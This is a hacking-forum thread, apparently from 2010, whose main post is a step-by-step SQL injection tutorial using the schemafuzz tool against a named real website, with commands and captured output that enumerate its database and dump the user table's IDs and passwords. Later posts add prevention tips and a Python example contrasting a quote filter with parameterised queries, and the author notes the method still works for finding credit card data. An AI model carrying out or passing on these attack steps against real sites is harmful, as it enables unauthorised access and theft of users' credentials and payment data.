SQL injection with schemafuzz

Post by angelblood on Fri Apr 16, 2010 9:00 am

Hey dude, now I'm going to give you a tutorial on SQL injection using schemafuzz. Let's start!
First step, get these ready:
1. Python (Windows users have to install it first; Linux users, MOVE ON!)
2. Schemafuzz, which you can find through Google (there are plenty of copies, especially on darkc0de.com)
3. Coffee
4. Snacks
5. A pack of Sampoerna Mild

Continue by looking for bugs on a vulnerable target website (they are usually found on news pages, article pages and many others).
To find out whether the site is vulnerable or not, check by adding a single quote ( ' ) at the end of the target URL, example: [You must be registered and logged in to see this link.] ==> note the ( ' ) sign.
If the website page shows an error message like "mySQL syntax error . . ." then that website is vulnerable to SQL injection.
To make things easier, just put the schemafuzz.py file on the desktop.
Then open a terminal (Linux) or command prompt (Windows) and go to the desktop by typing (in the command prompt): cd Desktop.
Find the columns on the target site by running schemafuzz, command:
schemafuzz.py --findcol -u [You must be registered and logged in to see this link.]
result:

[+] URL:http://www.ditplb.or.id/profile.php?id=1--
[+] Evasion Used: "+" "--"
[+] 14:10:38
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: [You must be registered and logged in to see this link.]
[+] darkc0de URL: [You must be registered and logged in to see this link.]
[-] Done!
From the data above, there are 3 columns (wow, that's very few)!
Next, find the database name, command:
schemafuzz.py --dbs -u [You must be registered and logged in to see this link.]
result:

[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:15:38
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] [14:16:13]
[-] Total URL Requests 3
[-] Done
Got the database name.
Now check its tables and columns straight away (don't forget to add after the URL: -D databasename), command:
schemafuzz.py --schema -u [You must be registered and logged in to see this link.] -D t15618_plb
result:

[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:20:00
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11

[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin

[-] [14:25:13]
[-] Total URL Requests 48
[-] Done

Finally, enter the command:
schemafuzz.py --dump -u [You must be registered and logged in to see this link.] -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin

RESULT: USE WISELY!!

WHATEVER YOU DO AFTER READING THIS TUTORIAL IS NOT THE AUTHOR'S RESPONSIBILITY.

Post by cRim3²¹ on Fri Apr 16, 2010 9:11 pm

Laughing

Post by angelblood on Sat Apr 17, 2010 12:49 am

Mercy, bro, don't laugh at my tutorial, I really am a noob at this.

Post by cRim3²¹ on Sat Apr 17, 2010 1:17 am

I don't understand SQL either..

Thanks for the knowledge, bro..


A bit of info that's probably already stale...
______________________________________________________
especially for the admin and web programmers
______________________________________________________

Commonly used ways of preventing SQL injection:
1. Limit the length of the input box (if possible) by restricting it in the program code, so a beginner cracker may be puzzled for a moment when they see the input box can't be injected with a long command.
2. Filter the input entered by the user, especially the use of single quotes (Input Validation).
3. Turn off or hide the error messages that come out of the running SQL Server.
4. Disable standard facilities such as Stored Procedures and Extended Stored Procedures, if possible.
5. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.


A dumb share.. lol!
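
Added example, not from the thread, that tries items 1 and 2 of the list above against the injection the tutorial actually used, and next to it the fix the list does not mention. The profile.php?id=1 URL takes a numeric parameter, and the payload schemafuzz sent (1+AND+1=2+UNION+SELECT+0,1,...--) contains no single quote at all, so a quote filter plus a length cap let it straight through; what stops it is converting the value to an integer and binding it as a query parameter, so the database never parses user input as SQL. The table and its row are constructed here, and SQLite stands in for MySQL.

```python
import sqlite3


def build_db():
    """Constructed table modelled on the "profile" table in the schema listing above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profile (ID_Profile INTEGER, sinopsis TEXT, Profile TEXT);
        INSERT INTO profile VALUES (1, 'synopsis', 'profile text');
    """)
    return conn


def filter_input(value, max_len=64):
    """Items 1 and 2 of the list: cap the length and strip single quotes."""
    return value.replace("'", "")[:max_len]


def lookup_filtered(conn, id_param):
    """Applies the filter but still pastes the value into the SQL text."""
    sql = ("SELECT ID_Profile, sinopsis, Profile FROM profile "
           "WHERE ID_Profile=" + filter_input(id_param))
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_param):
    """The fix: the value is bound by the driver and is never parsed as SQL.
    Non-numeric input is rejected up front, without echoing a DB error (item 3)."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT ID_Profile, sinopsis, Profile FROM profile WHERE ID_Profile=?",
        (id_value,),
    ).fetchall()


# The tool's column probe, URL-decoded: 30 characters and not one quote in it.
PAYLOAD = "1 AND 1=2 UNION SELECT 0,1,2--"


if __name__ == "__main__":
    db = build_db()
    print("filtered:      ", lookup_filtered(db, PAYLOAD))        # [(0, 1, 2)] leaks
    print("parameterized: ", lookup_parameterized(db, PAYLOAD))   # [] rejected
    print("normal request:", lookup_parameterized(db, "1"))
```

The quote filter does hide the error that the single-quote test in the tutorial relies on (a request for id=1' is silently turned into id=1), so it defeats the detection trick, not the injection; the UNION payload returns the attacker's marker row just as before. Items 3 and 5 (no error text in the page, a low-privilege database account) are still worth doing, but as limits on how bad a leak gets, not as a substitute for binding parameters.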


Post by cRim3²¹ on Sat Apr 17, 2010 1:37 am

^
copy-pasted

Post by angelblood on Sat Apr 17, 2010 1:56 am

This is a tutorial for newbies, bro; if it's just for finding CCs, this method still works fine.

Unless we want to dump big sites, using this method is just a waste of time, because the tables it reads can run into the hundreds or even thousands.

But it's good too, giving the defense side.
Thanks.

Post by Hacker Ndeso on Tue Apr 20, 2010 12:22 pm

Let me join in....

Post by angelblood on Tue Apr 20, 2010 1:05 pm

Switching careers, leng?
lol!

Post by mummi_bakar on Fri Jun 11, 2010 7:12 pm

Whoa... so that's how it is...

Post by angelblood on Sat Jun 12, 2010 4:50 pm

Whoa, which master just joined?!

Post by mummi_bakar on Sun Jun 13, 2010 7:07 pm

I'm a newbie, bro...

Please guide me,

Post by angelblood on Sun Jun 13, 2010 8:59 pm

Being modest, eh.

Post by anak_luchu on Thu Jul 29, 2010 4:15 pm

Very Happy


Post by angelblood on Thu Jul 29, 2010 4:26 pm

Twisted Evil